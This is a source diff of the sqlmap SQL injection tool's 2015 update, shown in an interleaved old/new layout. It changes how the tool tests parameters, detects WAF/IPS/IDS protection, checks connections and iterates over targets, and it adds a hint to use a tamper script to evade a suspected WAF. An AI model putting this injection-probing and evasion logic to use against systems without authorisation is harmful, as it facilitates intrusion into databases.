||||||
|
|
||||||
return kb.heuristicTest
|
return kb.heuristicTest
|
||||||
|
|
||||||
def checkDynParam(place, parameter, value):
|
def checkDynParam(place, parameter, value):
|
||||||
|
@ -860,7 +933,9 @@ def checkDynParam(place, parameter, value):
|
||||||
dynResult = None
|
dynResult = None
|
||||||
randInt = randomInt()
|
randInt = randomInt()
|
||||||
|
|
||||||
infoMsg = "testing if %s parameter '%s' is dynamic" % (place, parameter)
|
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
|
||||||
|
|
||||||
|
infoMsg = "testing if %s parameter '%s' is dynamic" % (paramType, parameter)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
@ -868,7 +943,7 @@ def checkDynParam(place, parameter, value):
|
||||||
dynResult = Request.queryPage(payload, place, raise404=False)
|
dynResult = Request.queryPage(payload, place, raise404=False)
|
||||||
|
|
||||||
if not dynResult:
|
if not dynResult:
|
||||||
infoMsg = "confirming that %s parameter '%s' is dynamic" % (place, parameter)
|
infoMsg = "confirming that %s parameter '%s' is dynamic" % (paramType, parameter)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
randInt = randomInt()
|
randInt = randomInt()
|
||||||
|
@ -937,11 +1012,15 @@ def checkStability():
|
||||||
like for instance string matching (--string).
|
like for instance string matching (--string).
|
||||||
"""
|
"""
|
||||||
|
|
||||||
infoMsg = "testing if the target URL is stable. This can take a couple of seconds"
|
infoMsg = "testing if the target URL is stable"
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
firstPage = kb.originalPage # set inside checkConnection()
|
firstPage = kb.originalPage # set inside checkConnection()
|
||||||
time.sleep(1)
|
|
||||||
|
delay = 1 - (time.time() - (kb.originalPageTime or 0))
|
||||||
|
delay = max(0, min(1, delay))
|
||||||
|
time.sleep(delay)
|
||||||
|
|
||||||
secondPage, _ = Request.queryPage(content=True, raise404=False)
|
secondPage, _ = Request.queryPage(content=True, raise404=False)
|
||||||
|
|
||||||
if kb.redirectChoice:
|
if kb.redirectChoice:
|
||||||
|
@ -1060,59 +1139,38 @@ def checkWaf():
|
||||||
Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse
|
Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse
|
||||||
"""
|
"""
|
||||||
|
|
||||||
if not conf.checkWaf:
|
if any((conf.string, conf.notString, conf.regexp, conf.dummy, conf.offline)):
|
||||||
return False
|
return None
|
||||||
|
|
||||||
infoMsg = "heuristically checking if the target is protected by "
|
dbmMsg = "heuristically checking if the target is protected by "
|
||||||
infoMsg += "some kind of WAF/IPS/IDS"
|
dbmMsg += "some kind of WAF/IPS/IDS"
|
||||||
logger.info(infoMsg)
|
logger.debug(dbmMsg)
|
||||||
|
|
||||||
retVal = False
|
retVal = False
|
||||||
|
|
||||||
backup = dict(conf.parameters)
|
|
||||||
|
|
||||||
payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD)
|
payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD)
|
||||||
|
|
||||||
conf.parameters = dict(backup)
|
value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
|
||||||
conf.parameters[PLACE.GET] = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + "&"
|
value += agent.addPayloadDelimiters("%s=%s" % (randomStr(), payload))
|
||||||
conf.parameters[PLACE.GET] += "%s=%s" % (randomStr(), payload)
|
|
||||||
|
|
||||||
logger.log(CUSTOM_LOGGING.PAYLOAD, payload)
|
|
||||||
|
|
||||||
kb.matchRatio = None
|
|
||||||
Request.queryPage()
|
|
||||||
|
|
||||||
if kb.errorIsNone and kb.matchRatio is None:
|
|
||||||
kb.matchRatio = LOWER_RATIO_BOUND
|
|
||||||
|
|
||||||
conf.parameters = dict(backup)
|
|
||||||
conf.parameters[PLACE.GET] = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + "&"
|
|
||||||
conf.parameters[PLACE.GET] += "%s=%d" % (randomStr(), randomInt())
|
|
||||||
|
|
||||||
trueResult = Request.queryPage()
|
|
||||||
|
|
||||||
if trueResult:
|
|
||||||
conf.parameters = dict(backup)
|
|
||||||
conf.parameters[PLACE.GET] = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + "&"
|
|
||||||
conf.parameters[PLACE.GET] += "%s=%d %s" % (randomStr(), randomInt(), IDS_WAF_CHECK_PAYLOAD)
|
|
||||||
|
|
||||||
try:
|
try:
|
||||||
falseResult = Request.queryPage()
|
retVal = Request.queryPage(place=PLACE.GET, value=value, getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO
|
||||||
except SqlmapConnectionException:
|
except SqlmapConnectionException:
|
||||||
falseResult = None
|
|
||||||
|
|
||||||
if not falseResult:
|
|
||||||
retVal = True
|
retVal = True
|
||||||
|
finally:
|
||||||
conf.parameters = dict(backup)
|
kb.matchRatio = None
|
||||||
|
|
||||||
if retVal:
|
if retVal:
|
||||||
warnMsg = "it appears that the target is protected. Please "
|
warnMsg = "heuristics detected that the target "
|
||||||
warnMsg += "consider usage of tamper scripts (option '--tamper')"
|
warnMsg += "is protected by some kind of WAF/IPS/IDS"
|
||||||
logger.warn(warnMsg)
|
logger.critical(warnMsg)
|
||||||
else:
|
|
||||||
infoMsg = "it appears that the target is not protected"
|
if not conf.identifyWaf:
|
||||||
logger.info(infoMsg)
|
message = "do you want sqlmap to try to detect backend "
|
||||||
|
message += "WAF/IPS/IDS? [y/N] "
|
||||||
|
output = readInput(message, default="N")
|
||||||
|
|
||||||
|
if output and output[0] in ("Y", "y"):
|
||||||
|
conf.identifyWaf = True
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
|
@ -1130,6 +1188,8 @@ def identifyWaf():
|
||||||
def _(*args, **kwargs):
|
def _(*args, **kwargs):
|
||||||
page, headers, code = None, None, None
|
page, headers, code = None, None, None
|
||||||
try:
|
try:
|
||||||
|
pushValue(kb.redirectChoice)
|
||||||
|
kb.redirectChoice = REDIRECTION.NO
|
||||||
if kwargs.get("get"):
|
if kwargs.get("get"):
|
||||||
kwargs["get"] = urlencode(kwargs["get"])
|
kwargs["get"] = urlencode(kwargs["get"])
|
||||||
kwargs["raise404"] = False
|
kwargs["raise404"] = False
|
||||||
|
@ -1137,6 +1197,8 @@ def identifyWaf():
|
||||||
page, headers, code = Request.getPage(*args, **kwargs)
|
page, headers, code = Request.getPage(*args, **kwargs)
|
||||||
except Exception:
|
except Exception:
|
||||||
pass
|
pass
|
||||||
|
finally:
|
||||||
|
kb.redirectChoice = popValue()
|
||||||
return page or "", headers or {}, code
|
return page or "", headers or {}, code
|
||||||
|
|
||||||
retVal = False
|
retVal = False
|
||||||
|
@ -1168,9 +1230,10 @@ def identifyWaf():
|
||||||
if output and output[0] not in ("Y", "y"):
|
if output and output[0] not in ("Y", "y"):
|
||||||
raise SqlmapUserQuitException
|
raise SqlmapUserQuitException
|
||||||
else:
|
else:
|
||||||
infoMsg = "no WAF/IDS/IPS product has been identified"
|
warnMsg = "no WAF/IDS/IPS product has been identified"
|
||||||
logger.info(infoMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
kb.testType = None
|
||||||
kb.testMode = False
|
kb.testMode = False
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
@ -1186,10 +1249,10 @@ def checkNullConnection():
|
||||||
infoMsg = "testing NULL connection to the target URL"
|
infoMsg = "testing NULL connection to the target URL"
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
try:
|
||||||
pushValue(kb.pageCompress)
|
pushValue(kb.pageCompress)
|
||||||
kb.pageCompress = False
|
kb.pageCompress = False
|
||||||
|
|
||||||
try:
|
|
||||||
page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD)
|
page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD)
|
||||||
|
|
||||||
if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}):
|
if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}):
|
||||||
|
@ -1219,27 +1282,31 @@ def checkNullConnection():
|
||||||
errMsg = getUnicode(errMsg)
|
errMsg = getUnicode(errMsg)
|
||||||
raise SqlmapConnectionException(errMsg)
|
raise SqlmapConnectionException(errMsg)
|
||||||
|
|
||||||
|
finally:
|
||||||
kb.pageCompress = popValue()
|
kb.pageCompress = popValue()
|
||||||
|
|
||||||
return kb.nullConnection is not None
|
return kb.nullConnection is not None
|
||||||
|
|
||||||
def checkConnection(suppressOutput=False):
|
def checkConnection(suppressOutput=False):
|
||||||
if not any((conf.proxy, conf.tor, conf.dummy)):
|
if not any((conf.proxy, conf.tor, conf.dummy, conf.offline)):
|
||||||
try:
|
try:
|
||||||
|
debugMsg = "resolving hostname '%s'" % conf.hostname
|
||||||
|
logger.debug(debugMsg)
|
||||||
socket.getaddrinfo(conf.hostname, None)
|
socket.getaddrinfo(conf.hostname, None)
|
||||||
except socket.gaierror:
|
except socket.gaierror:
|
||||||
errMsg = "host '%s' does not exist" % conf.hostname
|
errMsg = "host '%s' does not exist" % conf.hostname
|
||||||
raise SqlmapConnectionException(errMsg)
|
raise SqlmapConnectionException(errMsg)
|
||||||
except socket.error, ex:
|
except socket.error, ex:
|
||||||
errMsg = "problem occurred while "
|
errMsg = "problem occurred while "
|
||||||
errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, str(ex))
|
errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, ex.message)
|
||||||
raise SqlmapConnectionException(errMsg)
|
raise SqlmapConnectionException(errMsg)
|
||||||
|
|
||||||
if not suppressOutput and not conf.dummy:
|
if not suppressOutput and not conf.dummy and not conf.offline:
|
||||||
infoMsg = "testing connection to the target URL"
|
infoMsg = "testing connection to the target URL"
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
kb.originalPageTime = time.time()
|
||||||
page, _ = Request.queryPage(content=True, noteResponseTime=False)
|
page, _ = Request.queryPage(content=True, noteResponseTime=False)
|
||||||
kb.originalPage = kb.pageTemplate = page
|
kb.originalPage = kb.pageTemplate = page
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -28,7 +28,10 @@ from lib.core.common import getUnicode
|
||||||
from lib.core.common import hashDBRetrieve
|
from lib.core.common import hashDBRetrieve
|
||||||
from lib.core.common import hashDBWrite
|
from lib.core.common import hashDBWrite
|
||||||
from lib.core.common import intersect
|
from lib.core.common import intersect
|
||||||
|
from lib.core.common import isListLike
|
||||||
from lib.core.common import parseTargetUrl
|
from lib.core.common import parseTargetUrl
|
||||||
|
from lib.core.common import popValue
|
||||||
|
from lib.core.common import pushValue
|
||||||
from lib.core.common import randomStr
|
from lib.core.common import randomStr
|
||||||
from lib.core.common import readInput
|
from lib.core.common import readInput
|
||||||
from lib.core.common import safeCSValue
|
from lib.core.common import safeCSValue
|
||||||
|
@ -126,8 +129,8 @@ def _selectInjection():
|
||||||
kb.injection = kb.injections[index]
|
kb.injection = kb.injections[index]
|
||||||
|
|
||||||
def _formatInjection(inj):
|
def _formatInjection(inj):
|
||||||
data = "Place: %s\n" % inj.place
|
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else inj.place
|
||||||
data += "Parameter: %s\n" % inj.parameter
|
data = "Parameter: %s (%s)\n" % (inj.parameter, paramType)
|
||||||
|
|
||||||
for stype, sdata in inj.data.items():
|
for stype, sdata in inj.data.items():
|
||||||
title = sdata.title
|
title = sdata.title
|
||||||
|
@ -146,14 +149,17 @@ def _formatInjection(inj):
|
||||||
vector = "%s%s" % (vector, comment)
|
vector = "%s%s" % (vector, comment)
|
||||||
data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
|
data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
|
||||||
data += " Title: %s\n" % title
|
data += " Title: %s\n" % title
|
||||||
data += " Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place == PLACE.POST and kb.postSpaceToPlus))
|
data += " Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place != PLACE.GET and kb.postSpaceToPlus))
|
||||||
data += " Vector: %s\n\n" % vector if conf.verbose > 1 else "\n"
|
data += " Vector: %s\n\n" % vector if conf.verbose > 1 else "\n"
|
||||||
|
|
||||||
return data
|
return data
|
||||||
|
|
||||||
def _showInjections():
|
def _showInjections():
|
||||||
header = "sqlmap identified the following injection points with "
|
if kb.testQueryCount > 0:
|
||||||
|
header = "sqlmap identified the following injection point(s) with "
|
||||||
header += "a total of %d HTTP(s) requests" % kb.testQueryCount
|
header += "a total of %d HTTP(s) requests" % kb.testQueryCount
|
||||||
|
else:
|
||||||
|
header = "sqlmap resumed the following injection point(s) from stored session"
|
||||||
|
|
||||||
if hasattr(conf, "api"):
|
if hasattr(conf, "api"):
|
||||||
conf.dumper.string("", kb.injections, content_type=CONTENT_TYPE.TECHNIQUES)
|
conf.dumper.string("", kb.injections, content_type=CONTENT_TYPE.TECHNIQUES)
|
||||||
|
@ -189,7 +195,9 @@ def _randomFillBlankFields(value):
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
def _saveToHashDB():
|
def _saveToHashDB():
|
||||||
injections = hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []
|
injections = hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True)
|
||||||
|
if not isListLike(injections):
|
||||||
|
injections = []
|
||||||
injections.extend(_ for _ in kb.injections if _ and _.place is not None and _.parameter is not None)
|
injections.extend(_ for _ in kb.injections if _ and _.place is not None and _.parameter is not None)
|
||||||
|
|
||||||
_ = dict()
|
_ = dict()
|
||||||
|
@ -251,7 +259,7 @@ def start():
|
||||||
return True
|
return True
|
||||||
|
|
||||||
if conf.url and not any((conf.forms, conf.crawlDepth)):
|
if conf.url and not any((conf.forms, conf.crawlDepth)):
|
||||||
kb.targets.add((conf.url, conf.method, conf.data, conf.cookie))
|
kb.targets.add((conf.url, conf.method, conf.data, conf.cookie, None))
|
||||||
|
|
||||||
if conf.configFile and not kb.targets:
|
if conf.configFile and not kb.targets:
|
||||||
errMsg = "you did not edit the configuration file properly, set "
|
errMsg = "you did not edit the configuration file properly, set "
|
||||||
|
@ -264,13 +272,16 @@ def start():
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
hostCount = 0
|
hostCount = 0
|
||||||
|
initialHeaders = list(conf.httpHeaders)
|
||||||
|
|
||||||
for targetUrl, targetMethod, targetData, targetCookie in kb.targets:
|
for targetUrl, targetMethod, targetData, targetCookie, targetHeaders in kb.targets:
|
||||||
try:
|
try:
|
||||||
conf.url = targetUrl
|
conf.url = targetUrl
|
||||||
conf.method = targetMethod
|
conf.method = targetMethod.upper() if targetMethod else targetMethod
|
||||||
conf.data = targetData
|
conf.data = targetData
|
||||||
conf.cookie = targetCookie
|
conf.cookie = targetCookie
|
||||||
|
conf.httpHeaders = list(initialHeaders)
|
||||||
|
conf.httpHeaders.extend(targetHeaders or [])
|
||||||
|
|
||||||
initTargetEnv()
|
initTargetEnv()
|
||||||
parseTargetUrl()
|
parseTargetUrl()
|
||||||
|
@ -308,13 +319,13 @@ def start():
|
||||||
if conf.forms:
|
if conf.forms:
|
||||||
message = "[#%d] form:\n%s %s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl)
|
message = "[#%d] form:\n%s %s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl)
|
||||||
else:
|
else:
|
||||||
message = "URL %d:\n%s %s%s" % (hostCount, conf.method or HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "")
|
message = "URL %d:\n%s %s%s" % (hostCount, HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "")
|
||||||
|
|
||||||
if conf.cookie:
|
if conf.cookie:
|
||||||
message += "\nCookie: %s" % conf.cookie
|
message += "\nCookie: %s" % conf.cookie
|
||||||
|
|
||||||
if conf.data is not None:
|
if conf.data is not None:
|
||||||
message += "\nPOST data: %s" % urlencode(conf.data) if conf.data else ""
|
message += "\n%s data: %s" % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST, urlencode(conf.data) if conf.data else "")
|
||||||
|
|
||||||
if conf.forms:
|
if conf.forms:
|
||||||
if conf.method == HTTPMETHOD.GET and targetUrl.find("?") == -1:
|
if conf.method == HTTPMETHOD.GET and targetUrl.find("?") == -1:
|
||||||
|
@ -324,13 +335,13 @@ def start():
|
||||||
test = readInput(message, default="Y")
|
test = readInput(message, default="Y")
|
||||||
|
|
||||||
if not test or test[0] in ("y", "Y"):
|
if not test or test[0] in ("y", "Y"):
|
||||||
if conf.method == HTTPMETHOD.POST:
|
if conf.method != HTTPMETHOD.GET:
|
||||||
message = "Edit POST data [default: %s]%s: " % (urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "")
|
message = "Edit %s data [default: %s]%s: " % (conf.method, urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "")
|
||||||
conf.data = readInput(message, default=conf.data)
|
conf.data = readInput(message, default=conf.data)
|
||||||
conf.data = _randomFillBlankFields(conf.data)
|
conf.data = _randomFillBlankFields(conf.data)
|
||||||
conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data
|
conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data
|
||||||
|
|
||||||
elif conf.method == HTTPMETHOD.GET:
|
else:
|
||||||
if targetUrl.find("?") > -1:
|
if targetUrl.find("?") > -1:
|
||||||
firstPart = targetUrl[:targetUrl.find("?")]
|
firstPart = targetUrl[:targetUrl.find("?")]
|
||||||
secondPart = targetUrl[targetUrl.find("?") + 1:]
|
secondPart = targetUrl[targetUrl.find("?") + 1:]
|
||||||
|
@ -366,7 +377,6 @@ def start():
|
||||||
if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp():
|
if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp():
|
||||||
continue
|
continue
|
||||||
|
|
||||||
if conf.checkWaf:
|
|
||||||
checkWaf()
|
checkWaf()
|
||||||
|
|
||||||
if conf.identifyWaf:
|
if conf.identifyWaf:
|
||||||
|
@ -420,11 +430,16 @@ def start():
|
||||||
if skip:
|
if skip:
|
||||||
continue
|
continue
|
||||||
|
|
||||||
|
if kb.testOnlyCustom and place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER):
|
||||||
|
continue
|
||||||
|
|
||||||
if place not in conf.paramDict:
|
if place not in conf.paramDict:
|
||||||
continue
|
continue
|
||||||
|
|
||||||
paramDict = conf.paramDict[place]
|
paramDict = conf.paramDict[place]
|
||||||
|
|
||||||
|
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
|
||||||
|
|
||||||
for parameter, value in paramDict.items():
|
for parameter, value in paramDict.items():
|
||||||
if not proceed:
|
if not proceed:
|
||||||
break
|
break
|
||||||
|
@ -436,7 +451,7 @@ def start():
|
||||||
if paramKey in kb.testedParams:
|
if paramKey in kb.testedParams:
|
||||||
testSqlInj = False
|
testSqlInj = False
|
||||||
|
|
||||||
infoMsg = "skipping previously processed %s parameter '%s'" % (place, parameter)
|
infoMsg = "skipping previously processed %s parameter '%s'" % (paramType, parameter)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
elif parameter in conf.testParameter:
|
elif parameter in conf.testParameter:
|
||||||
|
@ -445,45 +460,61 @@ def start():
|
||||||
elif parameter == conf.rParam:
|
elif parameter == conf.rParam:
|
||||||
testSqlInj = False
|
testSqlInj = False
|
||||||
|
|
||||||
infoMsg = "skipping randomizing %s parameter '%s'" % (place, parameter)
|
infoMsg = "skipping randomizing %s parameter '%s'" % (paramType, parameter)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
elif parameter in conf.skip:
|
elif parameter in conf.skip:
|
||||||
testSqlInj = False
|
testSqlInj = False
|
||||||
|
|
||||||
infoMsg = "skipping %s parameter '%s'" % (place, parameter)
|
infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
elif parameter == conf.csrfToken:
|
||||||
|
testSqlInj = False
|
||||||
|
|
||||||
|
infoMsg = "skipping anti-CSRF token parameter '%s'" % parameter
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
# Ignore session-like parameters for --level < 4
|
# Ignore session-like parameters for --level < 4
|
||||||
elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)):
|
elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)):
|
||||||
testSqlInj = False
|
testSqlInj = False
|
||||||
|
|
||||||
infoMsg = "ignoring %s parameter '%s'" % (place, parameter)
|
infoMsg = "ignoring %s parameter '%s'" % (paramType, parameter)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
elif PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech:
|
elif PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech or conf.skipStatic:
|
||||||
check = checkDynParam(place, parameter, value)
|
check = checkDynParam(place, parameter, value)
|
||||||
|
|
||||||
if not check:
|
if not check:
|
||||||
warnMsg = "%s parameter '%s' does not appear dynamic" % (place, parameter)
|
warnMsg = "%s parameter '%s' does not appear dynamic" % (paramType, parameter)
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
if conf.skipStatic:
|
||||||
|
infoMsg = "skipping static %s parameter '%s'" % (paramType, parameter)
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
testSqlInj = False
|
||||||
else:
|
else:
|
||||||
infoMsg = "%s parameter '%s' is dynamic" % (place, parameter)
|
infoMsg = "%s parameter '%s' is dynamic" % (paramType, parameter)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
kb.testedParams.add(paramKey)
|
kb.testedParams.add(paramKey)
|
||||||
|
|
||||||
if testSqlInj:
|
if testSqlInj:
|
||||||
|
try:
|
||||||
|
if place == PLACE.COOKIE:
|
||||||
|
pushValue(kb.mergeCookies)
|
||||||
|
kb.mergeCookies = False
|
||||||
|
|
||||||
check = heuristicCheckSqlInjection(place, parameter)
|
check = heuristicCheckSqlInjection(place, parameter)
|
||||||
|
|
||||||
if check != HEURISTIC_TEST.POSITIVE:
|
if check != HEURISTIC_TEST.POSITIVE:
|
||||||
if conf.smart or (kb.ignoreCasted and check == HEURISTIC_TEST.CASTED):
|
if conf.smart or (kb.ignoreCasted and check == HEURISTIC_TEST.CASTED):
|
||||||
infoMsg = "skipping %s parameter '%s'" % (place, parameter)
|
infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
infoMsg = "testing for SQL injection on %s " % place
|
infoMsg = "testing for SQL injection on %s " % paramType
|
||||||
infoMsg += "parameter '%s'" % parameter
|
infoMsg += "parameter '%s'" % parameter
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
@ -506,10 +537,14 @@ def start():
|
||||||
paramKey = (conf.hostname, conf.path, None, None)
|
paramKey = (conf.hostname, conf.path, None, None)
|
||||||
kb.testedParams.add(paramKey)
|
kb.testedParams.add(paramKey)
|
||||||
else:
|
else:
|
||||||
warnMsg = "%s parameter '%s' is not " % (place, parameter)
|
warnMsg = "%s parameter '%s' is not " % (paramType, parameter)
|
||||||
warnMsg += "injectable"
|
warnMsg += "injectable"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
finally:
|
||||||
|
if place == PLACE.COOKIE:
|
||||||
|
kb.mergeCookies = popValue()
|
||||||
|
|
||||||
if len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None):
|
if len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None):
|
||||||
if kb.vainRun and not conf.multipleTargets:
|
if kb.vainRun and not conf.multipleTargets:
|
||||||
errMsg = "no parameter(s) found for testing in the provided data "
|
errMsg = "no parameter(s) found for testing in the provided data "
|
||||||
|
@ -562,6 +597,11 @@ def start():
|
||||||
errMsg += "expression that you have chosen "
|
errMsg += "expression that you have chosen "
|
||||||
errMsg += "does not match exclusively True responses"
|
errMsg += "does not match exclusively True responses"
|
||||||
|
|
||||||
|
if not conf.tamper:
|
||||||
|
errMsg += " If you suspect that there is some kind of protection mechanism "
|
||||||
|
errMsg += "involved (e.g. WAF) maybe you could retry "
|
||||||
|
errMsg += "with an option '--tamper' (e.g. '--tamper=space2comment')"
|
||||||
|
|
||||||
raise SqlmapNotVulnerableException(errMsg)
|
raise SqlmapNotVulnerableException(errMsg)
|
||||||
else:
|
else:
|
||||||
# Flush the flag
|
# Flush the flag
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -71,9 +71,9 @@ def setHandler():
|
||||||
items.remove(_)
|
items.remove(_)
|
||||||
items.insert(0, _)
|
items.insert(0, _)
|
||||||
|
|
||||||
for name, aliases, Handler, Connector in items:
|
for dbms, aliases, Handler, Connector in items:
|
||||||
if conf.dbms and conf.dbms not in aliases:
|
if conf.dbms and conf.dbms.lower() != dbms and conf.dbms.lower() not in aliases:
|
||||||
debugMsg = "skipping test for %s" % name
|
debugMsg = "skipping test for %s" % dbms
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
|
@ -84,7 +84,7 @@ def setHandler():
|
||||||
logger.debug("forcing timeout to 10 seconds")
|
logger.debug("forcing timeout to 10 seconds")
|
||||||
conf.timeout = 10
|
conf.timeout = 10
|
||||||
|
|
||||||
dialect = DBMS_DICT[name][3]
|
dialect = DBMS_DICT[dbms][3]
|
||||||
|
|
||||||
if dialect:
|
if dialect:
|
||||||
sqlalchemy = SQLAlchemy(dialect=dialect)
|
sqlalchemy = SQLAlchemy(dialect=dialect)
|
||||||
|
@ -93,7 +93,10 @@ def setHandler():
|
||||||
if sqlalchemy.connector:
|
if sqlalchemy.connector:
|
||||||
conf.dbmsConnector = sqlalchemy
|
conf.dbmsConnector = sqlalchemy
|
||||||
else:
|
else:
|
||||||
|
try:
|
||||||
conf.dbmsConnector.connect()
|
conf.dbmsConnector.connect()
|
||||||
|
except NameError:
|
||||||
|
pass
|
||||||
else:
|
else:
|
||||||
conf.dbmsConnector.connect()
|
conf.dbmsConnector.connect()
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -10,6 +10,7 @@ import re
|
||||||
from lib.core.common import Backend
|
from lib.core.common import Backend
|
||||||
from lib.core.common import extractRegexResult
|
from lib.core.common import extractRegexResult
|
||||||
from lib.core.common import getSQLSnippet
|
from lib.core.common import getSQLSnippet
|
||||||
|
from lib.core.common import getUnicode
|
||||||
from lib.core.common import isDBMSVersionAtLeast
|
from lib.core.common import isDBMSVersionAtLeast
|
||||||
from lib.core.common import isNumber
|
from lib.core.common import isNumber
|
||||||
